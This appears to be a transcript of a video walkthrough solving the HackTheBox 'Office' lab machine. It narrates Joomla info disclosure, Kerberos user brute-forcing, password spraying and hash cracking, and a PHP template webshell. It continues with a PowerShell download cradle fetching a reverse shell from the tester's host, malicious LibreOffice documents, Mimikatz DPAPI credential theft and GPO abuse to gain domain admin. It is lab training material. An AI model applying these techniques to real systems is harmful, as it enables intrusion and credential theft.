What's going on YouTube? This is IPSec. I'm doing Office from HackTheBox, which is a hard Windows machine that has a lot of steps. Seriously, the hardest part about this box is all the recon you have to do. Each of the exploits isn't too technically hard, but they can be hard to find. It starts off with a Joomla information disclosure that gets you the MySQL password, and you can pair that up with a Kerberos brute force on Active Directory using KerBrute to get potential usernames that let you log into a FileShare. That FileShare has a PCAP file that has a Kerberos handshake that you can manually craft a hash in order to crack it. And then once you crack that, you log into Joomla, you can get a shell through editing the template. And on the box, you discover another website that you can upload resumes to. You can upload a LibreOffice document and get code execution through an exploit or enabling macros through editing the registry. Then you log in as a different user. You can get a credential through DPAPI that lets you log in as a user that has group policy management privileges. I know that's a lot, so let's just jump in. As always, we're going to start off with the nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose, so we have the TTL and things like that, OA output all formats, put in the nmap directory and call it office, then the IP address of 10.10.11.3. This can take some time to run, so I've already ran it. Looking at the results, we have 12 ports open. The first one being DNS on port 53, and its banner tells us it's simple DNS plus. And knowing this is a Windows box, as other banners have told us, we go straight down, look at LDAP, and confirm this is a Active Directory server. But let's keep going down the list. We have HTTP on port 80. And interesting enough, it's not running IIS. It is running Apache HTTPD 246. And normally when you install Apache, you're using a program called XAMPP. And very, very recently, there was a vulnerability in that. If we just Google XAMPP, what is it? PHP Windows exploit. It's from OrangeSci. The server is not going to be vulnerable, but it is something I would definitely look into. I thought it was on like the Wiz site or something. If we do Wiz, here we go, wiz.io. This has a lot of good information about it. I think the reason why it's not vulnerable is you have to have a different language set installed, such as Chinese, Simplified Chinese, or Japanese. The only language set is English, so it's not vulnerable to it, at least to my knowledge. This is definitely something that's good to read, and there's also a proof of concept exploit if you wanted to run this, but we can confirm it is not going to be vulnerable. I guess we can try running it just for peace of mind. So if we go into this, if we look at how to run it, we give it -c and then the PHP system syntax. So we're injecting this code into the web server, and this is the URL. So let's do Python 3 -c. I'm going to do a PHP system. We'll do ping 10.10.14.8. So we ping ourselves. And then let's do the target HTTP 10.10.11.3. And then we can set up a TCP dump and see if this works. And this is how I would go about just testing it first. I don't know. Oh, we didn't specify the Python script. There we go. And it says exploit may have failed. We could add the DNS name just in case that matters. So we can do 10.10.11.3 office.htb and then try it again. So let's now change the URL to be office.htb. And it doesn't look like it's vulnerable. We could take a look at the exploit script itself to see kind of how it's working. So we get the URL, then we're adding %AD. This is, I think, some type of quotation mark or hyphen in the different language. The %AD is critical to like the Japanese, Chinese language set. And then it just adds the PHP command in it. And it adds echo leet. And if leet is not in the response, then it dies. So that is exactly how this is working. But it's not vulnerable. I'm assuming it's not vulnerable because of the language set. So let's go back to nmap and see what else we have. There is Kerberos on port 88. Now we have some SMB stuff, LDAP. We have a domain name or dc.office.htb. So let's go ahead and add this. sudo v etc host dc. Okay. Go to the next port. We have 443. This is just looks like Apache. Looks slightly different because it's just a forbidden according to nmap. So let's just try https office.htb. See what happens here. We go to advanced, accept, and we just get a forbidden. So there's a different site here, I believe. If we went back up to port 80, it is running Joomla, right? So if I just did HTTP instead of HTTPS, we get the Joomla website. So something odd is going on there. After 443, we have SMB on 445. I don't know what 464 is. It's probably some Kerberos thing. LDAP. And that is about it. So let's go and take a look at the website, I guess. We know this is Joomla because nmap did tell us. If we went to like robots.txt, it tells us it's Joomla. And if you watch a lot of my videos, there is a way to enumerate Joomla version. I always forget the path. It's if you Google Joomla administrator manifest, there's an XML document called like manifest.xml. It's under manifest files joomla.xml. That's it. Manifest, there we go. And this is going to give us the Joomla version. So we have 427. So I'm going to Google Joomla 427 exploit. And we can see there are a few. And let's see. I was looking for one like on GitHub. This looks like it is probably Metasploit because it's in Ruby. But we have covered this exact CVE before. Maybe this is a proof of concept. And the one we did it in is devvortex, I want to say. Let's see. Joomla. Yeah, it was 426 in that one. But if you want to look more in this exploit, go to devvortex where we do it all manually and explain it probably a bit better than I'm going to do now. But let's just go and run this. Essentially, it is a, blanking on the word right now. Git clone. It is a IDOR vulnerability, essentially. I think it's like insecure direct object reference is what it stands for, but there is a API endpoint in Joomla that is not properly requiring authentication when you specify the variable. And as I say that, remember, it's not an IDOR, it's a mass assignment vulnerability. Because if we go in this exploit, we have to add public equals true, and the mass assignment converts all the endpoints to be public, as long as we add this argument. Definitely go check out the devvortex video if you want to see more of that. But let's just go ahead and run this exploit. Let's do -u http office.htb. And it's checking if the thing is vulnerable. And it hits a bunch of endpoints, does find one that has a password. So you may think if we just take this password, we go over to the Joomla login, and we should be able to log in with this password. If we do administrator, we can't. So if you want to see exactly what this is, I guess we could edit the script. Let's see. What does it say? Password. So if I search for no usernames, let's see, green. Okay. Let's just do a console print, and we want to send the URL. What is it? Target plus path. I'm looking right up here, how it does the get. And then we will run this exploit again and look at the URL it actually queries. So we're getting the application config. So if we go here, we look at this, and let's see. We have MySQL application. The host name is localhost, user root, and then the password here. So all we're doing here is looking at the MySQL config, and that is the password for the MySQL user. If we look at the info up here, there's only one username on Joomla, and that's administrator. So we have to figure out exactly what to do with this password. It's probably going to be used somewhere else in this box. And if we went back to the nmap results, this is a domain controller, right? So the first thing I would do is see if I can do a RPC brute force, because that's the best way to blindly enumerate usernames on a domain controller. So we have to get some type of authentication to the DC this way. So I'm going to just try user of guest and a password and see if we get a successful authentication. It takes a little bit. I wonder if I should just do 2 of these simultaneously. So we have guest account disabled. We can say does not exist. Try this. See if we can get any way to get the DC to give us access. Occasionally it's configured that allows anonymous users access to the DC. And if it does, then we can do the RID brute force without any type of credentials. But it doesn't look like we'll be able to here. So the other thing we can do is something called KerBrute, or brute forcing through Kerberos pre-authentication, I want to say is how it does it. But through the Kerberos protocol, we can validate if a user exists or not. The benefit to the RID brute force is we can just do it based upon numbers. We just specify like the UID of 1000, 1001, 1002, 1003, and we get the username correlated to that UID. With KerBrute, we have to actually know the username. So it's not as good at just blindly enumerating, but if you give it a large enough word list, you can get a lot of usernames. So we're going to do KerBrute user enum. We'll specify the DC, which is 10.10.11.3, then the domain office.htb, and then we want to give it the username file. So I'll do opt seclist usernames, and then that Zato 10 million usernames. And I'm also going to specify 100 threads. So it goes a little bit quickly. Usernames.text. There we go. And we probably need a out file as well. That is -o. So I'm going to give it -o, and we'll say KerBrute.out. It did not like that. -o should be output. I don't know why. I wonder if it doesn't have permission. Let's go HTTP office KerBrute.out. There we go. I guess that's just a poorly handled error message. If we looked up, maybe it says, okay, yeah. Panic, open KerBrute.out, permission denied. So here we're just validating usernames. We have 2 right off the bat. Windows is not case sensitive, so we probably could speed this up by making this word list all lowercase. But we have quite a few usernames right off the bat. This is probably going to take like 15 minutes to run. So I'm just going to periodically take this username list and we can spray it with the password we got from Joomla, which we probably should copy to creds, or let's just call it passwords.out. That's the wrong clipboard. There we go. So let's see. We want to get all those usernames. So if I cat KerBrute.out, we can pipe this, or we can grep on valid. And then we say awk print, let's see, 1, 2, 3, 4, 5, 6, 7. Okay. And then let's just split on the @ sign because we only want the username. We don't need the whole domain. And we can say usernames.text. There we go. So now we want to spray with that password. So let's do a NXC SMB 10.10.11.3. And then -u, I'm going to give it the usernames.text. The password, I think we can give it just passwords.out. That should just work fine. And then I'm going to give it continue on success, just in case there's multiple users that this password goes to. So let's see if it starts cranking. So we got password failures. It looks like DWOLFE we can access. So let's do username as DWOLFE. And then let's see what we have. It doesn't say pwned, so we can't just like PS exec to it. DWOLFE is not an administrator there. But looking at the shares, we can see we have a SOC analysis. We could have also done it's like RID brute from here, because now we have a valid credential. If we wanted to get other usernames quickly, this should work, right? As long as the flag is RID brute. So this is another way we could get usernames. We have a web account as well. I don't think TSTARK has been shown, but yeah. So let's see. We had shares. There is this SOC analysis. So we want to be able to read this. So let's do a SMB client -U DWOLFE 10.10.11.3 SOC analysis. Like that. And the password, it's a domain controller, so we don't need to worry about the domain name. We probably should do office.htb/dwolf. But domain controllers, you don't have to specify the domain at all. So looking at this, there is a PCAP file. So let's just do a get on this. And then let's examine what's in this PCAP. So we'll do Wireshark latest system_dump.pcap. And normally the first thing I would do, it's not going to be beneficial on this box because the hash that's in it is not supported. Maybe in the future we'll play with adding it, but I like running a tool called pcreds against PCAPs whenever I get it. You can just look at the GitHub here and run it. That would probably be my first step if I was going in completely blind. But let's look at Wireshark to see exactly what type of traffic we have. There's some DNS stuff that is business, Bing, so that's not interesting. So let's see. Let's look at SMB. See if there's anything interesting here. It doesn't look like too much. I was hoping to see like maybe a authentication or user or like file transfer. I don't see anything. We can look at NTLM SSP. This is another just authentication. We can look at the SMB header. I don't see like a username here, so that's probably not going to be beneficial to us. We can also check Kerberos and look at this. So this is the request. CPA data, request body. And this KerBTGT, this is the S name, which I think is server name. This is where we're authenticating to. If we look at CNAME, this should be ours. So TSTARK. So we have potentially the handshake of TSTARK. If we look at encryption type, this is going to be encryption type 18. And pcreds, I think, supports 23, not 18. But it's not hard to manually create these hashes as long as you have the encrypted timestamp, which we don't have. It would be right here. So this is the request. If we go to the second packet, though, we have the encrypted timestamp. And if we look at the value, we have this right here. And this is going to be key for generating the hash that Hashcat will use to be able to crack this. So let's go Google Hashcat example hashes to see how to format this. So let's see. How's the quickest way to find this? Probably if I search for K or B. Let's see. So if we look at this, this is the most common one, the AS request pre-auth. I'm going to search ETYPE 18. And we have a TGS rep right here. And this is what we want, I believe. Maybe there's other ETYPE 18. So it's either a TGS or pre-auth or DB. Let's see. I'm guessing it's going to be actually pre-authentication, encryption type 18. So let's go and grab this. I'm just gonna call it hashes, and this is gonna be example. And we want to paste this. So, whoops. And by paste, I just meant like create our own. So we leave 18. So this one is going to be the username. So that was what? T-Shark. Let's go back to Wireshark. Where is CNAME? T-Stark, not Shark. Probably Tony Stark because the whole Joomla was Avengers themed. And then we have hashcatdomain.com. Let's call this office.htb. That's just the domain name. And then this piece is going to be the actual hash or the encrypted timestamp. So let's go and grab the encrypted timestamp. There we go. Copy, value, and paste. So this should be the hash for TSTARK. So let's go over to the Kraken, which is just another machine on my network, because I don't want to run hashcat on my VM that I'm using to record videos and stuff because it's very CPU intensive. And you should probably never use hashcat on your VM. It should always be on bare metal. So let's go and create Office. We can paste this hash in. And then we can say /hashcat hashes office. And what do we want to give it as a word list? Opt word list rocku.txt. And it seems like it is going away. And let's see, we have recovered 1 out of 1. So if I add a --show, we can see it got the password as Playboy69. So now we have Tony Stark's password. So let's try this against Joomla. So I'm going to go back to the administrator page. And then we'll say T-Stark. Put in that password. Did not work. Let's try administrator. With this, maybe Tony is the person that set up Joomla, and he is. And I should have known that before, because when we were doing this whole enumeration thing with the Joomla exploit, there was only one username, and that was administrator, right? So that's why we definitely couldn't use Tony Stark. So let's go and find where the template is, because the quickest way to get RCE once you're on a CMS is to look at the templating area, because most CMSs have it, and then just edit a PHP script. So I'm going to edit offline.php. And we just want to make sure we can find this. So let's see. It is HTTP, Office HTTP. It's in templates. And then Cassiopeia. And we said offline.php. Okay. So let's just make sure we can get code execution. So I'm going to do a if is set and then request CMD. And the reason why I do this is if you don't put this if then and then just do the system command, like system request CMD, if we just did this, then the page would error if anyone hit this offline.php, because it can't find this variable, right? And you never really want to do that because it just tells everyone how to execute code. Also, like if you're doing it on index.php, then the error message could just take down the website. So it's always best to put it in a if is set first. So let's save this. And now we can just do CMD equals who am I? And it did not work. Let's see. If is set, request CMD. Maybe it didn't save by the time we executed it. Control U. Something wonky is going on. Let's see. If is set. Does PHP need this? I don't think so. Let's do an echo as well. see. I am offline. It's not cached. Let's see. I definitely created an error there. Okay. So I'm not sure why it didn't work before when I just had this. But we have code execution. Awesome. So let's go ahead and send this over to Burp Suite so we can quickly get a reverse shell. Let's go proxy, intercept is on. Send this, go over to repeater, convert this request. And now I need to create a web cradle. So what I'm going to do is make a directory www, and then let's copy opt or cp user local. Where's Nashang? Is it user share Nashang, shells, PowerShell, or invoke PowerShell TCP one line.ps1. And we probably should rename this to just shell.ps1. And let's see. Let's delete that. And then edit the IP address to be ours. So 10.10.14.8. And I always like sending it to port 9001. So what we have to do now is set up a web server. And then we can go over here and do a PowerShell IEX new object net.web client download string HTTP 10.10.14.8 port 8000 shell.ps1 nclvmp 9001 send the string and we see a get and then the connection come through. I think if we used a double quote, it actually wouldn't work. Let's just test this out. Because I know people sometimes have trouble with this. I have a vague memory of this being very like quote specific, right? You can see the double quote is not working. What if I URL encode this? Let's just go convert selection, URL, all characters, sure. No. So you definitely want to use single quotes with this. So if you're just out of habit using doubles, is not going to work. Or maybe there's a cron that is reverting the template. Maybe that's what got me earlier. Let's just turn Burp Suite off, refresh. Let's save this. Refresh, okay. Maybe that's it. So double quotes did not work. Let's convert selection, URL, all characters. Still nothing. Let's go back to single quotes. And that's definitely taking longer to get our shell. Now, I forgot to do one thing that I always like doing, and that is setting up RL wrap so I can have the up and down arrows with my shell. So let's go do that again. And now we have a shell as, who are we? The web account. So the first thing I always look at is just a whoami/all or /privs, because the main thing I want to see is if we have SE impersonate. Normally when you exploit a web service, you'll have this on a Windows box. Here we don't, but if we had it, we could use one of the potatoes to quickly escalate to root. The other thing we'd look at is just the members we are, or the groups. Looking at this quickly, I don't really see any groups that really stand out, right? So when we first did this, or when we first accessed the box, there was something on like https office.htb, and that was forbidden. So I want to see what else there is on this web server. Normally I would go pillage like the Joomla config and look for the password that is MySQL, but we already got that from that one Joomla exploit, right? So I'm going to go in XAMPP PHP docs, And then we have a administrator directory, internal, and Joomla. So these are probably 3 different sites. One of these is probably going to be the HTTPS. And there's a logs directory, one error PHP. I don't know what this is. Don't have an account. So Joomla is writing logs here for whatever reason. Is that on this? What is logs? Doesn't look like that's coming back. So I really don't know what administrator is. And looks like my session is not active. Can we ping it? Ping 10.10.11.3. Looks like maybe my VPN had died. Looks like it did. Okay, sweet. My shell is still alive. That is a miracle. We go to internal. Logs. I did ASD. It is also forbidden. So that wasn't like a 404. If I did ASD and got a 404, then I know I was definitely in that administrator directory, but I don't. Looking at internal, we got resume.php. If we look at this, don't know exactly what this site is, and I can't make sense of the HTML. We have PHP here. It's looking at the file name, allowing us to upload Word documents and open Office documents. And it's all we can really make sense of. Let's go look at the XAMPP config, or the Apache config, I should say. So if we look at the Apache config, it's probably going to be httpd.conf. Let's see, is 443 here? If we search, it is not. Administrator, nope, not in the config. What was the other one? Internal? There we go. So we can see there is a virtual host on port 8083 pointing to c:/XAMPP HTDocs internal, but we didn't see this on our nmap. It could be that 8083 is not in the top 10,000, so we didn't scan it. So let's go take a look, 10.10.3, 8083. And it doesn't look like we can connect to this port. So we have to use Chisel in order to access it. So I'm going to go in program data, and then we're going to upload Chisel. Let's go cp op chisel, chisel.exe. And we can go download this. So Python 3 mhttp server wget http 10.10.14.8 8000 chisel.exe. And then let's see. While that runs, I guess we can start up the server. So let's do chisel, specify the server. We want to allow reverse forwarding, and we'll start it on port 8001. So now let's connect to us. So we can do chisel.exe, client, 10.10.14.8, port 8001. We're going to do a reverse port forward on 8083. And then we're going to send everything through that to this Chisel application. And on the other end, we're going to say it goes to 127.0.0.1, 8083. And there we go. We have the proxy up. So now if I do 127.0.0.1, 8083, we can see what that internal page is all about. So if we go over to the submit application, we can upload documents. So if we did ipsec root at ipsec.rocks, and if we had a open Office document, we could upload it here. And supposedly someone would be opening this, right? We can choose the department we want to go in. So let's see, we probably should get another shell. So let's do that real quick. NCLVNP 9001. Let's go here, save, burp suite, send. And we have a shell. So what we want to do is see what version of OpenOffice and Microsoft Office are installed. Is it like WMIC query products? No. Let's see. PowerShell list installed software. Let's see. Get WMI object class 132 project. That is not doing anything. I wonder if it's because I'm in this like weird shell. Let's see. Is there like a program data? Is it program 1? Where is OpenOffice going to be installed at? I did not do our LWrap, so I don't have my up arrows. Is it going to be in like license.txt? Could it be here? There's got to be a way to look at the version. Let's just use WinPeas. WinPeas will help us out. So WinPeas GitHub, or we probably have it on our box already. Opt WinPeas. It's probably peas. Opt peas. WinPeas x64. Because WinPeas will tell us all the software installed. So we can do wget http 10.10.14.8 8000 WinPeas x64.exe. We'll just call it WinPeas.exe because that's easier to say. Let's see, we are downloading it. So let's execute this. And it doesn't look like it's giving us the output as it runs. I wonder if I like did a 2-1 when I did like a whatever it was I'm trying to say, the get WMI object, if it would then show. I think something odd is going on with like standard out. But we have some things. This doesn't look like it's the full output of WinPeas or WinPeas. Definitely not the full output. Weird. We just must be in a really, really odd shell. I'm trying to see that error message. Okay, so let's switch to a different user and then we'll run WinPeas. So let's go cp or locate run as cs.exe. This is the easiest way to switch users on Windows. It's just getting this .NET program. If you just Google run as cs, you can find it on GitHub, but let's download this. 10.10.14.8 8000 run as cs.exe. And then we can get a shell as Tony Stark. Let's see, net user TSTARK does exist. So let's go / run as cs.exe TSTARK. His password was playboy69 cmd 10.10.14.8 9001. Does it get us a shell? It does not, because I probably screwed up the syntax somehow. And that is not timing out either. Let's get a shell again. Okay, let's see. Run as cs.exe TSTARK playboy 69 cmd exe. I forgot the -r. Let's do rl wrap. There we go. So let's see. If I do PowerShell, do I get my shell? I do. I want to see if this just magically works now. Get WMI object. class win32 product. It's taking longer, which is a good sign. I think my VPN died again. Nope, there we go. Let's see. I have a feeling that I hung that one shell. So I'm getting a second shell, and we're going to run WinPeas as this user. Okay, so as this runs, I'm going to pause the video and we'll resume when this is done. Hopefully WinPeas has more output than it did the last time. And it doesn't look like we got much more information from this. Not exactly sure why it's failing, but we do have a error message now. Requested registry access is not allowed. So if we do a whoami/all, let's see what groups we are. Here's our privileges. Let's see. What else do we have? Oddly enough, we have this registry editor group. It's odd that WinPeas is complaining that it can't access the registry, but okay. So it looks like the command we did here, this getWMI object, did finish. So if we look at it, we can probably find out now what version is. So we have LibreOffice 5262 installed. So if we go here and we Google exploit LibreOffice 5262, we can see there are multiple vulnerabilities. See, there should be a GitHub as well. So let's just clone this repository and we'll see how this exploit works. So if we do git clone, let's see, this is CVE 2023 23, this one. And let's see, it does a check vuln. This is the wrong one. That is the Joomla. I was like, how do we check with a macro in an Office document? And there's actually two ways to exploit this box. We're doing this way first. This is slightly unintended. And then we'll do the other way after this. So if we look at this, it's looking at the temp content.xml file and replaces the word payload with what we want. So let's look at exactly how this works. So if we go in samples, let's extract, let's make dir temp 7zx to extract. Open Office documents are just bunches of XML. If we go in content.xml, let's look for payload. And the actual CVE is pretty much this. The document is HTML, and apparently if we just add script, event listener, tell it it's a open office script, and then put macro shell in a command, it actually runs that command, which is kind of surprising. You can look up more about that CVE, but this is the gist of it. It's just injecting a script object in the content portion of the open office document, and then telling it it's a macro. And this actually works if OpenOffice macros are disabled, because it's not the standard way it runs a macro. The intended way is to take the registry editor permission we have and change the registry to enable macros in OpenOffice. So that's why I'm doing it this way first, to show that this works even if they aren't enabled, if they're running an out-of-date version of OpenOffice. So let's do arm-rf on temp. And let's create this. So let's do Python 3, CVE. What do we do? --cmd. Let's see. Let's do a PowerShell. We can do PowerShell encoded command. And let's take what we have here. I wonder if this is going to work. We can try this. Temp. Let's put this here. And let's see. Let's cat temp iConvert UTF-16 little endian base 64 W0. We'll grab this. I'm actually not sure if we can just run PowerShell in this exploit. Let's do -- output. I was doing a double take right there because I was like, wait, they're just doing wget. They're in PowerShell. But this is probably expecting OpenOffice to be ran on a Linux machine. So that's why it's like that. So let's see. We created a document. We have that running. Let's just start a shell. I'm going to stay on this screen to see if anything hits us. And we can go localhost 127.0.0.1 through a chisel. And we can upload our document that we just created. So let's do HTTP. And then let's see, what do we call this? Office. And then this one. And exploit ODT. So we can upload the resume. And it'll probably take a minute or two for that to actually run. So while that goes, I always like doing something in the background instead of just waiting around. So I'm going under the assumption that the PowerShell command didn't work. We're going to get a second way to get a reverse shell just in case like a few minutes pass and we don't have it. We can upload something else. So I'm going to use MSF Venom for this. So you can do MSF Venom -p Windows x64 shell _ reverse TCP. And then we can say lhost is equal to 10.10.14.8. lport is equal to 9001. Formats exe. Output is shell.exe. So this is just creating a quick executable that we can just put on the document and get it running that way, just in case we never get a call back here. So we have shell.exe there. That's in dub. So we can go back to program data. wget http 10.10.14.8 9001 or 8000 shell exe. Okay. So now we can do the Python CVE thing again. And let's see. Let's go like this. And we'll get rid of all this and we're just going to do C:\program data shell.exe. That is a lot less characters, and since it's just a binary, it has a higher chance of working. We probably should call it like exploit2.odt. Let's go back, browse exploit2, and let's move that web server. Where is it? To pane 5. Okay. So we'll upload exploit2. And let's see, we can probably, what is it? XAMPP HTDocs internal. dir applications. So we can see this is probably the application we have just uploaded. Give it a minute to see if it disappears, but also I'm just going to pause the video and look at this screen. If I see it downloading shell.ps1, then we get a shell, we know the PowerShell command macro worked. If we just get a shell and it doesn't do anything up here, we know it executed the executable. And if it does neither, we know we have to go back and figure out where we screwed up, right? It'll probably be how we generated it. I don't know which pane I generated on, if we still have that. Doesn't look like we do. But yeah, that's what we're going to do. I'm going to pause it and we'll wait. I'd only wait 5 minutes. So hopefully it doesn't take that long. And as soon as I hit the stop record button, we got our shell. If we look at it, we are now the ppots user. I do want to take a step back though and show that we didn't have to use that LibreOffice exploit because our previous user, TSTARK, was a member of the registry editor group, I want to say. If we do who am I slash, let's just do all. There is a custom group that enables us to edit the registry. And I say it's a custom group because it's Office /, so I think they just created this registry editor group. I've never seen it before. But I'm pretty sure it's custom and they just gave this user permission to edit the registry. And because they can edit the registry, that means they can enable macros, or they can change the security level. So if we just Google open office macro security level registry, I think that would tell us what we need to do. Let's see. Is that here? Oh, right here, this one. So here we have a listing of the values, right? Here's the key under either HKey local machine or current user. You set macro security level. 0 is going to be low, 1 is medium, 2 is high, and 3 is very high. So let's take a look at what our macro security level is currently set at. So we probably should copy this and we can say, what is it? Registry query, HKey, local machine, like that. And we can see it is set at 3. So that is high. So we can do reg and then add. Let's send the same exact thing. And copy, paste. And then we can say /v. We want to set the value. And it's a D word, I believe. We'll set it to be 0. And I'm going to do the /f to force. We're going to query it again. We see the value is set to 0. So now we want to create a document. And to do the very quick way, I'm just going to use Metasploit. So we're going to do sudo msfdb run. And this is going to just make it easier. If you want to manually create a macro in OpenOffice, if you go to ipsec.rocks, I'm sure there's a video that we do that. However, it would probably take an extra like 10 minutes to do it that way, whereas we can just do use exploit multi miscellaneous OpenOffice macro and pretty much have everything done for us, right? If we do show options, let's set the payload to be Windows x64 interpreter reverse TCP. Let's see, set lhost to be ton 0. And I think that's pretty much all we need to do, right? The file name can be msf.odt, that's fine. We probably have to set the server port to be 8081. I don't think the server port's really even used because I think this is like hosting the document off a web server. But we'll just set it just in case. So now if I do show options, we should have a document. So we can run it. And the document is stored there. So let's copy that somewhere we can access. And now let's upload it. So where is resume submission? Going to upload. Let's go up one, msf.odt. And before I do, there's probably going to be some type of cron that is setting this back, right? Yeah, it's back to 3. That is annoying. So let's set that to 0, then upload. And hopefully it sticks around long enough for us to get a shell. One thing I want to check, let's see, nclvmp. Okay. I wasn't 100% positive if Metasploit was like kept that handler open, the interpreter thing listening. So I just wanted to double check. Looks like it did. So I think we're good. Let's see. Let's buy cd XAMPP HT docs. Not inet pub. What do I want to go to? Internal applications. We can see my resume still exists. Let's see. That is still at 0. That's good. So I think we got to wait a couple minutes again to see this actually go away. It probably runs every minute. Oh, shoot. Let's see. dir, still there. Let's just do a sleep 300. And hopefully, when I come back, this resume will be gone and we will have a interpreter session open as well. And it didn't even take the 300 seconds. We do have a interpreter session open. We do sessions-i1, get UID. We can see we're also the ppots user. So you don't have to use that one CVE. You could just manually change the macro setting or macro security level in LibreOffice and then send the document as well and get code execution as ppots that way. The next step of the box is doing a query user and actually discovering you're in a interactive session, which is going to come in handy for this next part, right? Because whenever we land on domain join machines, we should always start looking at like DPAPI keys. So if I did like I think it's vault cmd list, let's see, vault cmd /list, we can see there is a Windows credential configured. Let's see. I thought it would show more. Let's see. Vault CMD. What else is there? Vault CMD. List creds. Vault CMD. List creds. All. Vault CMD. List creds. We are ppots. That's weird. I don't know why it's erroring. Okay, so there is credentials in this. I'm not sure exactly what is going on here, but if you wanted to look at DPAPI stuff, that's going to be in the user directory, so ppots, and then app data, roaming, Microsoft. And you should always download these files whenever you do something, because I'm sure if you go to ipsec.rocks, type DPAPI, we go over a better explanation of what we're about to do. Definitely check out like Access. That is a really good one. But you should always download these because these are going to be like your Windows and built-in password manager. And you may not be able to ever decrypt them because you need to know the user's password. But you could also use the domain key. So if you ever get domain administrator and get the master key to the domain, they can go back and decrypt all these DPAPI blobs. And a lot of times, since there's a lot more like SaaS products, the software as a service, just like websites with credentials, you'll find a lot more creds after you get domain administrator locally on like external things like Confluence, Jira, things like that. So I would highly, highly, highly recommend always looking in these directories to pillage all the DPAPI blobs. So if we do a dir here, let's see, we have vault, and I want to say that's where we want to go. No, credentials, right? We're in C: roaming Microsoft, then credentials. Credentials. There we go. Let's see. I forget how to make dir show hidden files, but if I do PowerShell, I can do get child items -force, and then we can see 3 blobs here. So 3 protected files. We can't really read these. If we do a type, it's just going to be an encrypted blob. So we need to get the master key. So the master key is going to be under protect. If we do dir, we want to go into this. This is the user SID that I am. And just like before, we have to do a -force. And we have 3 different blobs here. And normally to get the master key or the secret out of these, we need to know the user's password. But before I said we're currently logged in. So we can actually query the domain controller, which then will use Windows NTLM authentication to ask the domain controller to retrieve our blob for us. And since we're logged in, that's already cached. So we already have that handy to us. So let's upload Mimikatz to this box. I'm going to save this location. So v temp, we'll just save that. And let's go to program data. And we want to grab Mimikatz. So mimikatz.exe. I should have a copy somewhere, right? Yes, I do. Let's copy it to www. And then we can wget http 10.10.14.8 8000 mimikatz.exe. And let's hope that there's no defender that removes this file from us. Did not work. Do I not have my web server up anymore? I don't think I do. I did not. So there we go. We're downloading Mimikatz. And now we can execute it. And what we want to do is list the blobs. Before we do this, let's see. Okay. So the command we're going to run is going to be DPAPI master key. We're going to do n. I deleted the file? What? Oh, no. Here it is. Okay. So we want DPAPI master key in C: / this. And then we need to know the file names. So we'll give it 3 things because we want to try all 3 of these. Grab this one. And then grab this. And then at the end of this command, we just add /rpc, and that says get our password via RPC. So we can save that. And let's see if we get any master keys. So get our program data, mimikatz.exe. And now we're going to run each of these. So that was very fast. We got a key. I'm going to put that key here. Let's do the next one. We'll do the top. Grab this key. That's going really fast. Okay, that seems to be fine. I hope this is right. Yep, everything seems to be going fine. And now let's grab this one. Okay, so now we have all the master keys. Let's now go to the credentials and see if we can grab those. So that is cd \users p-pots app data roaming Microsoft credentials GCI force. And let's see. Let's start with the oldest one. Looks like this. Okay, so this command is going to be DPAPI cred, then /in c:\users pots app data roaming Microsoft credentials. And then we want to add /unprotect, then /master key. And then after master key is a colon. I wonder if I can just yank and put it here. There we go. And let's do, just in case that master key doesn't work, grab the next one. And if that doesn't work, we will go try the other one. So copy this. That didn't work. Grab this. This one looks like it did decrypt, but we don't have anything really useful. Decrypting credential, generic enterprise. The target is my target. Username my user. There's no blob. So that's probably not a good file. Let's see. Where do we grab them? Let's try the 841F. I think we did 18. So we can grab this. And I'm not an RL wrap, so I can't use the up and down key. And that's becoming a huge pain. So let's see if we can decrypt this one. We can. So we have office /HOGAN, and the password is happy for the win 183. And that's a domain password. So we have another set of credentials. So let's go, I'm just going to do creds.text, and we will paste this in. That was HHOGAN, right? HHOGAN. Awesome. So now let's get a shell as HOGAN. So we'll start up netcat, and then we'll just do the run as cs.exe again. And I actually think this user's a member of the remoting group, so we could use evo-winrm, but I really like the shell that run as cs gives. So we'll do this, then PowerShell -r 10.10.14.8 9001. And we got the shell. So if I do a who am I /all, we can see what we're a member of. And we see we're a member of the GPO managers. And if we actually ran Bloodhound on this, we'd see there was also an attack through this. Being a member of GPO managers, it means we can edit the GPOs. So we can use a tool like SharpGPOAbuse in order to create a policy that will add us to local admin. So let's go ahead and do that. You can also use this tool to like create a scheduled task and execute it to get code execution, but I always find that piece flaky. Whenever having ability to execute things through group policy, I always like doing the add to local admin. It's an older feature in Windows, so it's a bit more stable, I guess. I don't know why I always have like random issues when like running commands through scheduled tasks, but I do. So if you're doing GPO things, my recommendation is to add local admins. So we do sharp collection, and this, if you just Google sharp collection, you'll find it on GitHub. It's just a bunch of pre-compiled .NET binaries. I always use the .NET framework any. And then let's do sharp. You can see how many there are in this. SharpGPOAbuse. We'll copy it to www. And then because I don't want to type this again, let's just copy and paste it. And I'm going to make sure my server is running. Good thing I did that. It was not. So we can curl HTTP 10.10.14.8 port 8000 SharpGPOAbuse and download it there. And let's see. Let's do a wget, I guess. 10.10.14.8 8000. Error creating web. I wonder if this user has something odd in its configuration. Curl HTTP 10.10.14.8 8000. I'm doing a backslash. Did I do that on netcat as well? I did not. So I don't know exactly what the issue is here, but we have it. So let's do /sharpgpoabuse.exe, add local admin, user account, HOGAN, and then we'll tag it to the default domain policy. And this is going to just mean on every computer in the domain, HOGAN's going to be a local admin now. And we can't enumerate the domain. What? Let's see. Evil win rm -i 10.10.11.3 HOGAN happy for the win 183 pound. Try evil win rm. Program data. Paste this in. Okay, so I said I like the shell that run as CS gives me. Apparently, it gave me a bad shell. I'm not sure what that's about. Let's see, does not specify any group memberships. Okay, so I think we got it. I'm going to do a gp update / force just to force this. Who am I / all. Let's see. Remote management, users, pre, cert, interactive. We probably have to get a shell again. We can just do groups. So let's exit, connect back. And we should have built-in administrators now. So we have successfully added HHOGAN to the administrator group. So we can now go users, administrator, then desktop, and get root.txt. And that is going to be the box. So hope you guys enjoyed it. Take care, and I will see you all next time.